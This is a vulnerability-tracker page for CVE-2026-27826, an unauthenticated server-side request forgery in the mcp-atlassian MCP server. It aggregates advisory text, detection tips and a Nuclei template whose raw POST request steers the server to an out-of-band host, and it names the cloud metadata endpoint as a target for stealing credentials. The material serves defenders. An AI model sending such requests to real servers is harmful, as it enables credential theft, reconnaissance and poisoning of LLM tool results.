CVE-2026-27826
published 2026-03-10CVE-2026-27826: MCP Atlassian is a Model Context Protocol (MCP) server for Atlassian products (Confluence and Jira). Prior to version 0.17.0, an unauthenticated attacker who…
PriorityP268high8.2CVSS 3.1
AVAACLPRNUINSCCHILAN
EXPLOIT
EPSS
13.59%
96.0th percentile
MCP Atlassian is a Model Context Protocol (MCP) server for Atlassian products (Confluence and Jira). Prior to version 0.17.0, an unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer — not in any MCP tool handler - making it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169[.]254[.]169[.]254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool results. Version 0.17.0 fixes the issue.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sooperset | mcp-atlassian | < 0.17.0 | 0.17.0 |
| sooperset | mcp-atlassian | >= 0 < 0.17.0 | 0.17.0 |
| sooperset | mcp_atlassian | < 0.17.0 | 0.17.0 |
Detection & IOCsextracted from sources · hover to see the quote
path/mcp
otherX-Atlassian-Jira-Url
otherX-Atlassian-Jira-Personal-Token
otherMcp-Session-Id
command{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
- →Detect SSRF exploitation attempts by monitoring for inbound HTTP requests to mcp-atlassian's /mcp endpoint that include both X-Atlassian-Jira-Url and X-Atlassian-Jira-Personal-Token headers but lack an Authorization header. ↗
- →Alert on outbound HTTP requests from the mcp-atlassian server process to 169.254.169.254 (AWS/cloud instance metadata endpoint), which indicates active SSRF exploitation for IAM credential theft. ↗
- →The vulnerability resides in the HTTP middleware/dependency injection layer, not in MCP tool handlers — tool-level logging or tracing will NOT surface this attack; monitor at the HTTP ingress layer instead. ↗
- →Use the Nuclei PoC template logic as a detection signature: flag POST /mcp requests with Content-Type: application/json, a Mcp-Session-Id header, X-Atlassian-Jira-Url pointing to an external/unexpected host, and no Authorization header.
- ·The vulnerability is fixed in mcp-atlassian version 0.17.0; deployments on earlier versions are fully exposed with no authentication bypass required. ↗
- ·The attack surface only exists when mcp-atlassian is run in HTTP (server) mode; stdio/local transport modes are not affected by this network-reachable SSRF vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
osv·2026-03-10
CVE-2026-27826 [HIGH] MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
### Summary
An unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer — not in any MCP tool handler - making it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169.254.169.254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool re
GHSA
MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
ghsa·2026-03-10
CVE-2026-27826 [HIGH] CWE-918 MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
MCP Atlassian has SSRF via unvalidated X-Atlassian-Jira-Url / X-Atlassian-Confluence-Url headers
### Summary
An unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer — not in any MCP tool handler - making it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169.254.169.254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool re
No detection rules found.
Nuclei
mcp-atlassian < 0.17.0 - Server-Side Request Forgery
nuclei·CVSS 8.2
CVE-2026-27826 [HIGH] mcp-atlassian < 0.17.0 - Server-Side Request Forgery
mcp-atlassian 0'
condition: and
internal: true
- raw:
- |
POST /mcp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/json, text/event-stream
Mcp-Session-Id: {{session_id}}
X-Atlassian-Jira-Url: http://{{interactsh-url}}
X-Atlassian-Jira-Personal-Token: nuclei-ssrf-test
{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"jira_get_issue","arguments":{"issue_key":"TEST-1"}}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402201c2d2bc1759ba10f1da4284507fc108a50bd273b2729f4ecc929de3ece8369b7022075f54aafe6f4a343fb0f2f6f10302ff801e2a28455bf97733cfa778f0dc47155:922c64590222798bb761d5b6d8e72950
Hackernews
Actively Exploited nginx-ui Flaw (CVE-2026-33032) Enables Full Nginx Server Takeover
blogs_hackernews·2026-04-15·CVSS 9.8
CVE-2026-33032 [CRITICAL] Actively Exploited nginx-ui Flaw (CVE-2026-33032) Enables Full Nginx Server Takeover
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Actively Exploited nginx-ui Flaw (CVE-2026-33032) Enables Full Nginx Server Takeover
A recently disclosed critical security flaw impacting nginx-ui, an open-source, web-based Nginx management tool, has come under active exploitation in the wild.
The vulnerability in question is CVE-2026-33032 (CVSS score: 9.8), an authentication bypass vulnerability that enables threat actors to seize control of the Nginx service. It has been codenamed MCPwn by Pluto Security.
"The nginx-ui MCP (Model Context Protocol) integration exposes two HTTP endpoints: /mcp and /mcp_message," according to an advisory released by nginx-ui maintainers l
Wiz
CVE-2026-27826 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-27826 [HIGH] CVE-2026-27826 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27826 :
Python vulnerability analysis and mitigation
Authorization
169[.]254[.]169[.]254
Source : NVD
## 8.2
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mcp-atlassian
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CV
2026-03-10
Published